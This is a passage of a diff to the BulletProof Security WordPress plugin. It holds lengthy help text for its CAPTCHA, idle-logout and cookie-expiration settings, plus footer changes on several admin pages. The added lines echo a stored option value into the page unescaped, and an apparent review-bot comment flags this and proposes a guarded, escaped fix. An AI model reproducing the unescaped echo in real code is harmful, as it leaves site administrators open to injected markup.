Checking the Enable|Disable ISL For TinyMCE Editor checkbox will disable ISL for any/all pages that have a TinyMCE Editor on them.', 'bulletproof-security').'<br><br><strong>'.__('TinyMCE Editor Important Notes:', 'bulletproof-security').'</strong><br><br><strong>'.__('ISL and TinyMCE javascript Event Listeners:', 'bulletproof-security').'</strong><br>'.__('ISL uses javascript Event Listeners to monitor User activity for these ISL events: keyboard key is pressed, mouse button is pressed, mouse is moved, mouse wheel is rolled up or down, finger is placed on the touch surface/screen and finger already placed on the screen is moved across the screen. The TinyMCE Editor also uses javascript Event Listeners in the Visual Editor window. ISL can monitor User activity in the Text tab Editor window and the Editor Toolbar buttons or menus for any of the ISL events listed above, but cannot monitor any User activity in the TinyMCE Visual tab Editor window.', 'bulletproof-security').'<br><br><strong>'.__('TinyMCE Editor on WordPress Post, Page and Comments pages:', 'bulletproof-security').'</strong><br>'.__('This example is using an Idle Session Logout Time of 60 minutes. If the User is typing content/text for 60 continuous minutes in the WordPress Post, Page or Comments TinyMCE Visual Editor window and has not clicked or moved their mouse outside of the TinyMCE Visual Editor window for 60 continuous minutes and the Enable|Disable ISL For TinyMCE Editor checkbox option is not checked to disable ISL for TinyMCE Editors, then the User will see the native WP Confirm Navigation alert popup window with buttons to either Leave this Page or Stay on this Page. 
Clicking the Stay on this Page button resets the ISL timer again to 60 minutes and the User will not lose any of their content/text.', 'bulletproof-security').'<br><br><strong>'.__('TinyMCE Editor Instances used in other plugins and themes:', 'bulletproof-security').'</strong><br>'.__('If another plugin or theme is using instances of the TinyMCE Editor, like BPS Maintenance Mode MMode Editor TinyMCE Editor instance for example, then if all of the same conditions stated above for the WordPress Post, Page and Comments pages TinyMCE Visual Editor are the same then instead of seeing the native WP Confirm Navigation alert popup window, the User will be logged out automatically and the User\'s content/text will not be saved. If you are using TinyMCE Editor Instances in another plugin or theme that Users can use to add/edit content/text and you do not want to risk a User being logged out and losing any of their content/text then check the Enable|Disable ISL For TinyMCE Editor checkbox to disable ISL on any pages that contain a TinyMCE Editor Instance.', 'bulletproof-security').'<br><br><strong>'.__('Auth Cookie Expiration (ACE) General Info:', 'bulletproof-security').'</strong><br>'.__('The WordPress Authentication Cookie Expiration (ACE) time can be considered a "hard" setting vs ISL being a "soft" setting. If you set the Cookie Expiration to 60 minutes then 60 consecutive minutes after a User has logged in, that user will be logged out automatically whether that User is idle/inactive or not. The WordPress Authentication Cookie Expiration (ACE) time is set when a User logs in. The default WordPress Authentication Cookie Expiration time is 2880 Minutes/2 Days and 20160 Minutes/14 Days if a User checks the Remember Me checkbox when they login. The WordPress Authentication Cookie Expiration time is set/reset each time a User logs in. 
So if a User logs out and then logs back into the site then the Cookie Expiration time for that User is set again to whatever Auth Cookie Expiration Time that you choose or the WordPress default Cookie Expiration time if you do not use or turn On ACE.', 'bulletproof-security').'<br><br><strong>'.__('Turn On|Turn Off:', 'bulletproof-security').'</strong><br>'.__('ACE is Turned Off by default. Select ACE On to turn ACE On. Select ACE Off to turn ACE Off.', 'bulletproof-security').'<br><br><strong>'.__('Auth Cookie Expiration Time in Minutes:', 'bulletproof-security').'</strong><br>'.__('Enter the time in minutes for when a User should be logged out of your site. Example: Entering 720 will automatically logout Users who have been logged in for 720 consecutive minutes/12 hours. Only enter numbers and not any other characters. If you accidently enter a blank value for the for Auth Cookie Expiration Time or Remember Me Auth Cookie Expiration Time then ACE will use the default WordPress Authentication Cookie Expiration time.', 'bulletproof-security').'<br><br><strong>'.__('Remember Me Auth Cookie Expiration Time in Minutes:', 'bulletproof-security').'</strong><br>'.__('Enter the time in minutes for when a User should be logged out of your site when the User has checked the Remember Me checkbox on the WordPress Login page. Example: Entering 720 will automatically logout Users who have been logged in for 720 consecutive minutes/12 hours. Only enter numbers and not any other characters. If you accidently enter a blank value for the for Auth Cookie Expiration Time or Remember Me Auth Cookie Expiration Time then ACE will use the default WordPress Authentication Cookie Expiration time.', 'bulletproof-security').'<br><br><strong>'.__('Enable|Disable Remember Me Checkbox:', 'bulletproof-security').'</strong><br>'.__('Checking the Disable & do not display the Remember Me checkbox option will disable and not display the Remember Me checkbox for everyone including you. 
If you want to set and control the WordPress Remember Me setting then use the Remember Me Auth Cookie Expiration Time in Minutes option setting instead and choose an amount of time you would like to use for the Cookie expiration time.', 'bulletproof-security').'<br><br><strong>'.__('User Account Exceptions:', 'bulletproof-security').'</strong><br>'.__('To create exceptions for User Account names enter User Account names (case-insensitive) separated by a comma and a space: johnDoe, janeDoe. Auth Cookie Expiration Time settings will not be applied to any User Account names that you add in this text box and these User Accounts will instead use the default WordPress Authentication Cookie Expiration time. User Account Exceptions override the User Roles option setting. Example: If johnDoe is an Administrator and you have enabled ACE for the Administrator User Role and you have added johnDoe in the User Account Exceptions text box then the johnDoe User Account Exception will override the Administrator User Role option setting and the johnDoe User Account will use the default WordPress Authentication Cookie Expiration time. It is recommended that you add your User Account name, but if you also want to be automatically logged out for the Auth Cookie Expiration time that you choose then do not add your User Account name.', 'bulletproof-security').'<br><br><strong>'.__('Enable|Disable Auth Cookie Expiration Time For These User Roles:', 'bulletproof-security').'</strong><br>'.__('Checking a User Role checkbox will apply the Auth Cookie Expiration Time that you choose for all Users with that User Role (See User Account Exceptions). Unchecking a User Role checkbox will apply the default WordPress Authentication Cookie Expiration time for all Users with that User Role. Example: If you only check the Subscriber checkbox then ACE will only apply the Auth Cookie Expiration Time setting that you choose for Users that are Subscribers. 
If your website is using/has Custom User Roles, your Custom User Roles will be displayed in a scrollable box below the standard WP User Roles: Administrator, Editor, Author, Contributor, Subscriber.', 'bulletproof-security').'<br><br>';
16
  }
17
 
18
  /** JTC-Lite stripped down version of the BEAST - BPS Pro JTC Anti-Spam|Anti-Hacker **/
19
+ $bps_modal_content2 = '<strong>'.__('If you forget what the CAPTCHA is and cannot login to your website use FTP or your web host control panel file manager and rename the /bulletproof-security/ plugin folder name to /_bulletproof-security/. Login to your website, go to the BPS JTC-Lite page and correct the CAPTCHA issue/problem. Rename the /_bulletproof-security/ plugin folder name back to /bulletproof-security/.', 'bulletproof-security').'</strong><br><br><strong>'.__('JTC-Lite Manual Setup Steps', 'bulletproof-security').'</strong><br>'.__('1. Enter a user friendly CAPTCHA in the JTC CAPTCHA text box.', 'bulletproof-security').'<br>'.__('2. Copy and paste the CAPTCHA you entered in the JTC CAPTCHA text box into the JTC ToolTip text box.', 'bulletproof-security').'<br>'.__('3. Either keep this default text "Hover or click the text box below" that will be displayed on all your forms or edit this text and add the message you want to add.', 'bulletproof-security').'<br>'.__('4. Check the Login Form checkbox and click the Save Options button.', 'bulletproof-security').'<br><br><strong>'.__('General Info about JTC-Lite', 'bulletproof-security').'</strong><br>'.__('JTC-Lite protects the WordPress Login form against automated SpamBot and HackerBot Brute Force Login attacks. Prevents User Accounts from being locked repeatedly by constant Brute Force Login attacks on your Login page. If you would like to protect all of your WordPress forms get the full version of JTC - BPS Pro JTC Anti-Spam|Anti-Hacker.', 'bulletproof-security').'<br><br><strong>'.__('JTC CAPTCHA: ', 'bulletproof-security').'</strong><br>'.__('This is the CAPTCHA that users will enter to Login to your website. You can use any numbers or characters and spaces in the CAPTCHA. You can even use HTML code characters except for these HTML code characters: < > \' " &. 
You can use a phrase for the CAPTCHA or it can be a single word or you can use your own original combination of words, numbers and HTML characters.', 'bulletproof-security').'<br><br><strong>'.__('Note: ', 'bulletproof-security').'</strong>'.__('It is recommended that you make your CAPTCHA user friendly, simple, clear and easy to understand for your users.', 'bulletproof-security').'<br><br><strong>'.__('JTC ToolTip: ', 'bulletproof-security').'</strong><br>'.__('This is the jQuery ToolTip message that is displayed to users when they hover or click on the CAPTCHA text box. This is where you will tell your users what they need to enter for the CAPTCHA. It can be a phrase, complete this sentence, a Hint or simply just Type/Enter: xxxxx or you can get as creative as you want to get with your jQuery ToolTip. Randomness is what makes a CAPTCHA very effective. JTC is designed with CAPTCHA randomness capability as one of its primary features.', 'bulletproof-security').'<br><br><strong>'.__('JTC Title|Text: ', 'bulletproof-security').'</strong><br>'.__('This is the text that is displayed to users above the CAPTCHA text box/Form Field.', 'bulletproof-security').$networkMUJTCText.'<br><br><strong>'.__('Enable JTC for WooCommerce (BPS Pro Only):', 'bulletproof-security').'</strong><br>'.__('Check this checkbox if you have the WooCommerce plugin installed if you would like to use BPS JTC on the WooCommerce custom login page. BPS JTC will still continue to work normally on the standard WordPress Forms: Login, Register, Lost Password, Comment, Multisite Register, BuddyPress Register and BuddyPress Sidebar Login Forms when you check this checkbox. This checkbox option setting is not for turning JTC On or Off if you are using WooCommerce. 
Use the JTC Enable|Disable JTC For These Forms option checkboxes to enable or disable JTC on each of your Forms.', 'bulletproof-security').'<br><br><strong>'.__('Enable|Disable JTC For These Forms (Only the Login Form CAPTCHA is available in BPS Free): ', 'bulletproof-security').'</strong><br>'.__('Checking a Form checkbox will display a CAPTCHA on that Form to all users. Unchecking a Form checkbox will remove the CAPTCHA on that Form for all users. The Comment Form is a special case and the CAPTCHA can be displayed based on the User Roles that you choose. See the Comment Form help section below.', 'bulletproof-security').'<br><br><strong>'.__('Comment Form: (only applies if Comment Form CAPTCHA is enabled/checked) ', 'bulletproof-security').'<br>'.__('Enable|Disable JTC For These Registered/Logged In User Roles (BPS Pro Only:', 'bulletproof-security').'</strong><br>'.__('Users must be logged into your website for the Comment Form User Roles to work. If you do not require that users are registered and logged in to post comments on your website then these JTC options will not have any effect. These options are only for registered and logged in users and only for your Comment Form if you are using this WordPress Discussion setting: Users must be registered and logged in to comment. If you do not want to require that users are registered and logged in to comment then the JTC Comment Form CAPTCHA will still work as long as you have this WordPress Discussion setting checked: Comment author must fill out name and email.', 'bulletproof-security').'<br><br>'.__('Checking a User Role checkbox will display a CAPTCHA to all users with that User Role on your website\'s Comment Form. Unchecking a User Role checkbox will remove the CAPTCHA from displaying to users with that User Role on your website\'s Comment Form. 
If your website is using/has Custom User Roles, your Custom User Roles will be displayed in a scrollable box below the standard WP User Roles: Administrator, Editor, Author, Contributor, Subscriber.', 'bulletproof-security').'<br><br><strong>'.__('Login Form: CAPTCHA Error message:', 'bulletproof-security').'</strong><br>'.__('The Default JTC Form CAPTCHA error message is: <strong>ERROR</strong>: Incorrect JTC CAPTCHA Entered. You can change or add to the default error message. This error message is displayed on the Login Form.', 'bulletproof-security').'<br><br><strong>'.__('Comment Form CAPTCHA Error message (BPS Pro Only):', 'bulletproof-security').'</strong><br>'.__('The Default JTC Comment Form CAPTCHA error message is: <strong>ERROR</strong>: Incorrect JTC CAPTCHA Entered. Click your Browser\'s back button and re-enter the JTC CAPTCHA. You can change or add to the default error message. This error message only applies to the Comment Form CAPTCHA error message and does not affect or change any of the other Form CAPTCHA error messages.', 'bulletproof-security').'<br><br><strong>'.__('Comment Form: CSS Styling (BPS Pro Only)', 'bulletproof-security').'</strong><br>'.__('You can position the JTC Title|Text Form label and the JTC CAPTCHA Form Input text box by editing the CSS in these text boxes. By default the position of the JTC Title|Text label and the JTC CAPTCHA Form Input text box is below your Comment Form submit button. 
For CSS code styling examples.', 'bulletproof-security').'<br><br><strong>'.__('Comment Form Label (BPS Pro Only):', 'bulletproof-security').'</strong><br>'.__('This is the JTC Title|Text label above the Form Input text box.', 'bulletproof-security').'<br><strong>'.__('Comment Form Input Text Box (BPS Pro Only):', 'bulletproof-security').'</strong><br>'.__('This is the JTC CAPTCHA Form Input text box.', 'bulletproof-security').'<br><br><strong>'.__('Additional Brute Force CAPTCHA Option: ', 'bulletproof-security').'</strong><br>'.__('If you do not allow anyone else to log into your website then here is an example of how JTC could be used as an additional Brute Force Login Protection feature.', 'bulletproof-security').'<br><br>'.__('Example: You create a JTC CAPTCHA: My Example CAPTCHA, you either leave the JTC ToolTip: text box blank or you create a Hint for yourself - JTC ToolTip: My Example Hint. If your JTC ToolTip: text box is blank then the CAPTCHA will not be displayed - only you will know what the CAPTCHA is. If you create a personal Hint for yourself then only you will know what the answer to the Hint is.', 'bulletproof-security').'</strong>';
20
 
21
  /** Idle Session Logout|Auth Cookie Expiration **/
22
  $bps_modal_content3 = '<strong>'.__('Idle Session Logout (ISL) General Info:', 'bulletproof-security').'</strong><br>'.__('Idle Session Logout (ISL) can be considered a "soft" setting vs ACE being a "hard" setting. ISL uses javascript Event Listeners to monitor Users activity for these ISL events: keyboard key is pressed, mouse button is pressed, mouse is moved, mouse wheel is rolled up or down, finger is placed on the touch surface/screen and finger already placed on the screen is moved across the screen.', 'bulletproof-security').'<br><br>'.__('If you set the Idle Session Logout Time to 60 minutes and the User is idle/inactive for 10 minutes and becomes active again then the Idle Session Logout Time starts all over again/is reset to 60 minutes. If a User is idle/inactive for 60 continuous minutes then that User will be automatically logged out of the site and redirected to the BPS Idle Session Logout Page.', 'bulletproof-security').'<br><br>'.__('When an idle/inactive User is logged out of the site they are redirected to the BPS Idle Session Logout Page URL if their Browser is still open. If the User\'s Browser is still open and the User is on another Browser tab window then the Browser tab window where they are logged into your site will be redirected to the BPS Idle Session Logout Page URL. If the User has closed their Browser without logging out of your site then that User will not be logged out of your site. You can use ACE to log User\'s out of your site whether or not they have closed their Browser. Idle Session Logouts are logged in the BPS Security Log file.', 'bulletproof-security').'<br><br><strong><font color="blue">'.__('After making any option setting changes click the Save Options button to save your new option settings. 
To reset ISL option settings back to the default ISL option settings, delete any custom values/entries you have entered in any text/textarea boxes and click the Save Options button.', 'bulletproof-security').'</font></strong><br><br><strong>'.__('Turn On|Turn Off:', 'bulletproof-security').'</strong><br>'.__('ISL is Turned Off by default. Select ISL On to turn ISL On. Select ISL Off to turn ISL Off.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Time in Minutes:', 'bulletproof-security').'</strong><br>'.__('Enter the time in minutes for when an idle/inactive User should be logged out of your site. Example: Entering 60 will automatically logout Users who have been idle/inactive for 60 continuous minutes. Only enter numbers and not any other characters. If you accidently enter a blank value for the Idle Session Logout Time then ISL will be disabled automatically.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Page URL:', 'bulletproof-security').'</strong><br>'.__('When an idle/inactive User is logged out of your site they are redirected to the BPS Idle Session Logout Page URL by default. You can choose to redirect logged out users to any URL that you want to redirect them to by entering the URL in this text box. Example: If you enter the URL path to your WP Login page then user\'s will be redirected to your WP Login page instead of the default BPS Idle Session Logout Page.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Page Login URL:', 'bulletproof-security').'</strong><br>'.__('This option displays a clickable Login URL/link to your WP Login page. If your Login page URL is different than the default URL that you see displayed in the Idle Session Logout Page Login URL text box then change the URL to the URL for your site\'s Login page. 
You can choose not to display a Login URL/link by entering "No" (without quotes) if you do not want a Login URL/link displayed.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Exclude URLs|URIs:', 'bulletproof-security').'</strong><br>'.__('This option allows you to exclude any pages or posts that you do not want ISL to check/monitor. Important: The URI path is everything after the root portion or your domain URL. Example: If the page/post you want to exclude is here: www.example.com/some-post/ then the URI Exclusion that you would use/enter is: /some-post/. If the page/post you want to exclude is here: www.example.com/category/some-post/ then the URI Exclusion that you would use/enter is: /category/some-post/.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Page Custom Message:', 'bulletproof-security').'</strong><br>'.__('You can either use the default BPS ISL message/text by leaving the textarea box blank or you can enter your own custom ISL message/text in this textarea box that you want displayed to logged out users. Your custom message will be displayed on the default BPS ISL Logout page unless you choose to redirect users to a different URL/link using the Idle Session Logout Page URL option setting.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Page Custom CSS Style:', 'bulletproof-security').'</strong><br>'.__('You can either use the default BPS CSS Style code or enter your own custom CSS Style customizations.', 'bulletproof-security').'<br><br><strong>'.__('User Account Exceptions:', 'bulletproof-security').'</strong><br>'.__('To create exceptions for User Account names enter User Account names (case-insensitive) separated by a comma and a space: johnDoe, janeDoe. ISL will be turned Off/disabled for any User Account names that you add in this text box. User Account Exceptions override the User Roles option setting. 
Example: If johnDoe is an Administrator and you have enabled ISL for the Administrator User Role and you have added johnDoe in the User Account Exceptions text box then the johnDoe User Account Exception will override the Administrator User Role option setting and ISL will still be disabled for the johnDoe User Account. It is recommended that you add your User Account name, but if you also want to be automatically logged out when your User Account is idle/inactive then do not add your User Account name.', 'bulletproof-security').'<br><br><strong>'.__('Enable|Disable Idle Session Logouts For These User Roles:', 'bulletproof-security').'</strong><br>'.__('Checking a User Role checkbox will enable ISL for all Users with that User Role (See User Account Exceptions). Unchecking a User Role checkbox will disable ISL for all Users with that User Role. Example: If you only check the Subscriber checkbox then ISL will only be enabled for Users that are Subscribers. If your website is using/has Custom User Roles, your Custom User Roles will be displayed in a scrollable box below the standard WP User Roles: Administrator, Editor, Author, Contributor, Subscriber.', 'bulletproof-security').'<br><br><strong>'.__('Enable|Disable Idle Session Logouts For TinyMCE Editors:', 'bulletproof-security').'</strong><br>'.__('Please read all of the TinyMCE Editor Important Notes below. 
Checking the Enable|Disable ISL For TinyMCE Editor checkbox will disable ISL for any/all pages that have a TinyMCE Editor on them.', 'bulletproof-security').'<br><br><strong>'.__('TinyMCE Editor Important Notes:', 'bulletproof-security').'</strong><br><br><strong>'.__('ISL and TinyMCE javascript Event Listeners:', 'bulletproof-security').'</strong><br>'.__('ISL uses javascript Event Listeners to monitor User activity for these ISL events: keyboard key is pressed, mouse button is pressed, mouse is moved, mouse wheel is rolled up or down, finger is placed on the touch surface/screen and finger already placed on the screen is moved across the screen. The TinyMCE Editor also uses javascript Event Listeners in the Visual Editor window. ISL can monitor User activity in the Text tab Editor window and the Editor Toolbar buttons or menus for any of the ISL events listed above, but cannot monitor any User activity in the TinyMCE Visual tab Editor window.', 'bulletproof-security').'<br><br><strong>'.__('TinyMCE Editor on WordPress Post, Page and Comments pages:', 'bulletproof-security').'</strong><br>'.__('This example is using an Idle Session Logout Time of 60 minutes. If the User is typing content/text for 60 continuous minutes in the WordPress Post, Page or Comments TinyMCE Visual Editor window and has not clicked or moved their mouse outside of the TinyMCE Visual Editor window for 60 continuous minutes and the Enable|Disable ISL For TinyMCE Editor checkbox option is not checked to disable ISL for TinyMCE Editors, then the User will see the native WP Confirm Navigation alert popup window with buttons to either Leave this Page or Stay on this Page. 
Clicking the Stay on this Page button resets the ISL timer again to 60 minutes and the User will not lose any of their content/text.', 'bulletproof-security').'<br><br><strong>'.__('TinyMCE Editor Instances used in other plugins and themes:', 'bulletproof-security').'</strong><br>'.__('If another plugin or theme is using instances of the TinyMCE Editor, like BPS Maintenance Mode MMode Editor TinyMCE Editor instance for example, then if all of the same conditions stated above for the WordPress Post, Page and Comments pages TinyMCE Visual Editor are the same then instead of seeing the native WP Confirm Navigation alert popup window, the User will be logged out automatically and the User\'s content/text will not be saved. If you are using TinyMCE Editor Instances in another plugin or theme that Users can use to add/edit content/text and you do not want to risk a User being logged out and losing any of their content/text then check the Enable|Disable ISL For TinyMCE Editor checkbox to disable ISL on any pages that contain a TinyMCE Editor Instance.', 'bulletproof-security').'<br><br><strong>'.__('Auth Cookie Expiration (ACE) General Info:', 'bulletproof-security').'</strong><br>'.__('The WordPress Authentication Cookie Expiration (ACE) time can be considered a "hard" setting vs ISL being a "soft" setting. If you set the Cookie Expiration to 60 minutes then 60 consecutive minutes after a User has logged in, that user will be logged out automatically whether that User is idle/inactive or not. The WordPress Authentication Cookie Expiration (ACE) time is set when a User logs in. The default WordPress Authentication Cookie Expiration time is 2880 Minutes/2 Days and 20160 Minutes/14 Days if a User checks the Remember Me checkbox when they login. The WordPress Authentication Cookie Expiration time is set/reset each time a User logs in. 
So if a User logs out and then logs back into the site then the Cookie Expiration time for that User is set again to whatever Auth Cookie Expiration Time that you choose or the WordPress default Cookie Expiration time if you do not use or turn On ACE.', 'bulletproof-security').'<br><br><strong>'.__('Turn On|Turn Off:', 'bulletproof-security').'</strong><br>'.__('ACE is Turned Off by default. Select ACE On to turn ACE On. Select ACE Off to turn ACE Off.', 'bulletproof-security').'<br><br><strong>'.__('Auth Cookie Expiration Time in Minutes:', 'bulletproof-security').'</strong><br>'.__('Enter the time in minutes for when a User should be logged out of your site. Example: Entering 720 will automatically logout Users who have been logged in for 720 consecutive minutes/12 hours. Only enter numbers and not any other characters. If you accidently enter a blank value for the for Auth Cookie Expiration Time or Remember Me Auth Cookie Expiration Time then ACE will use the default WordPress Authentication Cookie Expiration time.', 'bulletproof-security').'<br><br><strong>'.__('Remember Me Auth Cookie Expiration Time in Minutes:', 'bulletproof-security').'</strong><br>'.__('Enter the time in minutes for when a User should be logged out of your site when the User has checked the Remember Me checkbox on the WordPress Login page. Example: Entering 720 will automatically logout Users who have been logged in for 720 consecutive minutes/12 hours. Only enter numbers and not any other characters. If you accidently enter a blank value for the for Auth Cookie Expiration Time or Remember Me Auth Cookie Expiration Time then ACE will use the default WordPress Authentication Cookie Expiration time.', 'bulletproof-security').'<br><br><strong>'.__('Enable|Disable Remember Me Checkbox:', 'bulletproof-security').'</strong><br>'.__('Checking the Disable & do not display the Remember Me checkbox option will disable and not display the Remember Me checkbox for everyone including you. 
If you want to set and control the WordPress Remember Me setting then use the Remember Me Auth Cookie Expiration Time in Minutes option setting instead and choose an amount of time you would like to use for the Cookie expiration time.', 'bulletproof-security').'<br><br><strong>'.__('User Account Exceptions:', 'bulletproof-security').'</strong><br>'.__('To create exceptions for User Account names enter User Account names (case-insensitive) separated by a comma and a space: johnDoe, janeDoe. Auth Cookie Expiration Time settings will not be applied to any User Account names that you add in this text box and these User Accounts will instead use the default WordPress Authentication Cookie Expiration time. User Account Exceptions override the User Roles option setting. Example: If johnDoe is an Administrator and you have enabled ACE for the Administrator User Role and you have added johnDoe in the User Account Exceptions text box then the johnDoe User Account Exception will override the Administrator User Role option setting and the johnDoe User Account will use the default WordPress Authentication Cookie Expiration time. It is recommended that you add your User Account name, but if you also want to be automatically logged out for the Auth Cookie Expiration time that you choose then do not add your User Account name.', 'bulletproof-security').'<br><br><strong>'.__('Enable|Disable Auth Cookie Expiration Time For These User Roles:', 'bulletproof-security').'</strong><br>'.__('Checking a User Role checkbox will apply the Auth Cookie Expiration Time that you choose for all Users with that User Role (See User Account Exceptions). Unchecking a User Role checkbox will apply the default WordPress Authentication Cookie Expiration time for all Users with that User Role. Example: If you only check the Subscriber checkbox then ACE will only apply the Auth Cookie Expiration Time setting that you choose for Users that are Subscribers. 
If your website is using/has Custom User Roles, your Custom User Roles will be displayed in a scrollable box below the standard WP User Roles: Administrator, Editor, Author, Contributor, Subscriber.', 'bulletproof-security').'<br><br>';
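--- a/admin/maintenance/maintenance.php
+++ b/admin/maintenance/maintenance.php
@@ -150,6 +150,7 @@ $bpsSpacePop = '-------------------------------------------------------------';
  $bps_plugin_dir = str_replace( ABSPATH, '', WP_PLUGIN_DIR );
  // Replace ABSPATH = wp-content
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
  // Top div echo & bottom div echo
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
  $bps_bottomDiv = '</p></div>';
@@ -2102,7 +2103,7 @@ if ( isset( $_POST['Submit-maintenance-mode-off'] ) && current_user_can('manage_
  </table>
  </div>
 
- <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
+ <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; echo $vcheck_options['bps_vcheck']; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
  </div>
  </div>
  </div>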
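Review bot: `$vcheck_options['bps_vcheck']` is echoed into the `<div id="AITpro-link">` footer with neither a type check nor output escaping. `get_option()` returns `false` when the `bulletproof_security_options_vcheck` option does not exist, so the array index is then read on a non-array, and whatever string is stored in that option is written into the admin page as raw HTML. I would guard and escape at the point of output: `echo isset( $vcheck_options['bps_vcheck'] ) ? esc_html( $vcheck_options['bps_vcheck'] ) : '';` (or `wp_kses_post()` if the value is meant to carry markup, which the hunk does not show). The same pair of added lines appears in the mscan.php, security-log.php, system-info.php and theme-skin.php sections of this page.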
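--- a/admin/mod-test/index.php
+++ b/admin/mod-test/index.php
@@ -2,7 +2,7 @@
  <html xmlns="http://www.w3.org/1999/xhtml">
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>mod_rewrite, mod_authz_core, mod_authz_host &amp; mod_access_compat Module Testing</title>
+ <title>Apache Modules Testing: mod_rewrite, mod_authz_core, mod_authz_host, mod_security, mod_security2 &amp; mod_access_compat</title>
  <meta name="robots" content="noindex, nofollow" />
  </head>
 
@@ -18,7 +18,7 @@ pre {background:#fff url(pre_bg.png) top left repeat;color:#000;display:block;fo
  -->
  </style>
 
- <h2 style="color:#fff;">Apache Modules: mod_rewrite, mod_authz_core, mod_authz_host &amp; mod_access_compat (directives: Order, Allow and Deny) testing</h2>
+ <h3 style="color:#fff;">Apache Modules Testing: mod_rewrite, mod_authz_core, mod_authz_host, mod_security, mod_security2 &amp; mod_access_compat (directives: Order, Allow and Deny)</h3>
 
  <table class="Mod-Directive-Testing" width="100%" border="1">
  <thead>
@@ -153,7 +153,7 @@ pre {background:#fff url(pre_bg.png) top left repeat;color:#000;display:block;fo
  </tbody>
  </table>
 
- <h3 style="color:#fff;">Additional Testing for Web Hosts that ignore/do not allow/do not process IfModule conditions:</h3>
+ <h3 style="color:#fff;">Additional Testing for Web Hosts that ignore/do not allow/do not process IfModule conditions and Mod Security testing:</h3>
 
  <table class="Mod-Directive-Testing-no-ifmodule" width="100%" border="1">
  <thead>
@@ -279,7 +279,7 @@ Require host example.com
  </tbody>
  </table>
 
- <h3 style="color:#fff;">Apache No IfModule Condition & Directive Test Results Explanation:</h3>
+ <h3 style="color:#fff;">Apache No IfModule Condition, Directive & Mod Security Test Result Explanations:</h3>
  <p style="color:#fff;">Some Web Hosts ignore/do not allow/do not process all IfModule conditions and the test results for tests 1-6 above will NOT be accurate. Tests 7-11 check mod_access_compat, mod_rewrite, mod_authz_core and mod_authz_host directives without any IfModule conditions. The mod_access_compat directives <strong>"Order, Deny, Allow"</strong> should work on every single Web Host at this present time. The Apache transition from mod_access_compat to the new mod_authz_core and mod_authz_host Modules will probably result in various issues/problems on some Web Hosts during that transitional period. BPS checks your current loaded Modules and directive htaccess code compatiblity and creates htaccess code that works specifically on your particular server/website/host. If things change in the future with your Web Host or you move to another host or server, BPS will check that you htaccess code is correct for your particular server/website/host and display a message to run the Setup Wizard again if necessary, which will create new htaccess code that works specifically for your particular server/website/host.</p>
 
  <table class="Mod-Directive-Testing-Description" width="100%" border="1">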
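--- a/admin/mscan/mscan.php
+++ b/admin/mscan/mscan.php
@@ -91,6 +91,7 @@ $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
  // Replace ABSPATH = wp-content/uploads
  $wp_upload_dir = wp_upload_dir();
  $bps_uploads_dir = str_replace( ABSPATH, '', $wp_upload_dir['basedir'] );
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
 
  function bpsPro_mscan_openbasedir_check() {
 
@@ -1924,7 +1925,7 @@ jQuery(document).ready(function($){
  </table>
  </div>
 
- <div id="AITpro-link">BulletProof Security Pro <?php echo BULLETPROOF_VERSION; ?> Plugin by <a href="https://forum.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
+ <div id="AITpro-link">BulletProof Security Pro <?php echo BULLETPROOF_VERSION; echo $vcheck_options['bps_vcheck']; ?> Plugin by <a href="https://forum.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
  </div>
  </div>
  </div>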
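--- a/admin/security-log/security-log.php
+++ b/admin/security-log/security-log.php
@@ -72,6 +72,7 @@ $bpsSpacePop = '-------------------------------------------------------------';
  $bps_plugin_dir = str_replace( ABSPATH, '', WP_PLUGIN_DIR );
  // Replace ABSPATH = wp-content
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
 
  // Top div echo & bottom div echo
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
@@ -810,7 +811,7 @@ jQuery(document).ready(function($){
  </table>
  </div>
 
- <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
+ <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; echo $vcheck_options['bps_vcheck']; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
  </div>
  </div>
  </div>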
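--- a/admin/system-info/system-info.php
+++ b/admin/system-info/system-info.php
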